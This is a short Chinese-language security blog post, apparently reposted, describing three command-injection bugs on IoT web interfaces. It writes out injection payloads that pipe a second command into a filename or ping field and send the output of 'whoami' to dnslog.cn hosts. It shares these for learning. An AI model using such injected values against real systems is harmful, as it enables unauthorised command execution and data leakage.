此文库主要是记录一年来一些有趣的漏洞,拿出来给大家分享一下,仅供学习参考,禁止对任何未授权的网站进行实操。此系列会持续更新~~~也欢迎大家投稿!!1.命令执行不说废话直接上图,这是一个iot的站所以有些功能点就很奇怪的。修改filename里面的内容:111.wav|ping `whoami`.v5hy64.dnslog.cn神奇吧,为什么我会想到在filename拼接语句呢因为平时在上传点的filename也是有概率存在rce的,所以我就试了试凑字数凑字数凑字数凑字数凑字数凑字数凑凑字数凑字数字数2.命令执行还是iot的站看到ping的字眼就要注意了,这个包很明显就是在ping 192.168.5.1这个包,把192.168.5.1改成192.168.5.1|curl `whoami`.vi50t3.dnslog.cn 看看会怎么样3.(惊掉你眼睛的)命令执行同样还是iot的站,跟上面是同一个站点这是试听的原始包。但是他的返回包是这样的于是在wav后缀后面加上|ping `whoami`.ykjxel.dnslog.cn神奇吧!!!!!!!!!!
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NjU3NzE3OQ==&mid=2247488205&idx=1&sn=e05f73fa078a2c15d2d4a2eb4e01b043&chksm=c07fa939f708202f45241ea9314e45107c227c2a5ac83128e69d478717758fdd177a8ba3bd3c#rd
如有侵权请联系:admin#unsafe.sh